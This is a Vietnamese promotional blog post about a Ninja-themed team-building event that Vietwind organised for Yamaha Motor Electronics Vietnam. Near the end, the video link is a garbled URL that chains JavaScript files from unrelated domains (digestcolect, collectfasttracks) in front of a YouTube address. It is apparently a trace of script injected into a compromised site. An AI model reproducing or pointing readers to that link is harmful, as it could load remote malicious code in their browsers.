Team building Chiến binh Ninja – Yamaha Motor Electronics Việt Nam

Ngày 22/9 vừa qua, huyền thoại về cuộc chiến của những chiến binh Ninja chính thức được tái hiện trong chương trình Team building của Yamaha Motor Electronics Việt Nam diễn ra tại Asean Resort với sự quy tụ của 200 chiến binh thiện chiến. 

1. Yamaha Motor Electronics Việt Nam

Được thành lập từ 24/06/2002, công ty Yamaha Motor Electronics Việt Nam bởi tập đoàn Yamaha Motor Nhật Bản với số vốn đầu tư  lên đến 3. 500. 000 USD.Trải qua 16 năm hoạt động và phát triển, Yamaha Motor Electronics Việt Nam là một trong những công ty dẫn đầu trong lĩnh vực sản xuất linh kiện, phụ tùng điện tử  cho xe máy, xe hơi.

DOLA9189 (Copy)

Để đạt được những thành công đó, Yamaha luôn chú trọng đến các hoạt động gắn kết và phát triển con người. Vượt qua nhiều đối thủ, Vietwind vinh dự là đơn vị tổ chức team building cho Yamaha Motor Electronics Việt Nam.

2. Chương trình Team building Chiến binh Ninja

Lần đầu tiên và duy nhất, các chiến binh Yamaha đã có cơ hội trải nghiệm một chương trình team building Chiến binh Ninja với concept ĐỘC – LẠ – CHẤT chưa từng có. Mong muốn xóa bỏ những lối mòn ý tưởng trong các chương trình team building truyền thống – vốn chỉ phụ thuộc vào sự mới mẻ của các dụng cụ gametools, bộ phận sáng tạo của Vietwind đã ấp ủ và tạo nên một concept team building độc đáo, hấp dẫn, lồng ghép những bài học đầy ý nghĩa dành riêng cho các doanh nghiệp.

Không phải ngẫu nhiên mà Vietwind lựa chọn hình tượng Ninja cho TEAM BUILDING GẮN KẾT DOANH NGHIỆP. Ít ai để ý rằng những phẩm chất của một Ninja có sự tương đồng và liên kết mạnh mẽ với những phẩm chất tuyệt vời mà mọi chủ doanh nghiệp đều mong muốn ở những nhân viên:

DOLA9233 (Copy)

DOLA9336 (Copy) (Copy)Tinh thần đồng đội – Tính kỉ luật trong một tập thể

DOLA9379 (Copy) (Copy)

DOLA9384 (Copy) (Copy)Lòng trung thành với tổ chức

team-building-ninja-yamaha-motor-electronics

DOLA9301 (Copy) (Copy)

DOLA9310 (Copy) (Copy)Linh hoạt – Nhạy bén – Thiện chiến

Hoá thân thành những Ninja đến từ Tứ đại Cường quốc, các chiến binh thiện chiến của Yamaha Motor Electronics Việt Nam đã phối hợp vô cùng ăn ý cùng những thành viên trong nhóm. Đồng thời, họ đã vận dụng tư duy và những kĩ năng điêu luyện của một Ninja để hoàn thành xuất sắc những thử thách của Vietwind.

team-building-ninja-yamaha-motor-electronics

Nếu lòng quả cảm của một Ninja được coi là sức mạnh để vượt qua mọi khó khăn, thì teamwork chính là keo dính để gắn kết những chiến binh Ninja Yamaha và tạo nên chiến thắng.

Một tập thể gắn kết. Niềm cảm hứng và động lực cho công việc. Kĩ năng xây dựng chiến lược. Những ý tưởng và sáng kiến mới. Là những gì mà các chiến binh Yamaha Motor Electronics Việt Nam đã nhận được sau hành trình gắn kết cùng Vietwind.

>>Khám phá cuộc chiến của những chiến binh tại đây

https://css.digestcolect.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&www.youtube.com/watch?v=lokN9hgSO1Q

Bạn đã sẵn sàng để trở thành những chiến binh tiếp theo ?

>>> YES! TÔI ĐÃ SẴN SÀNG

Facebook Comments

Bài Viết Liên Quan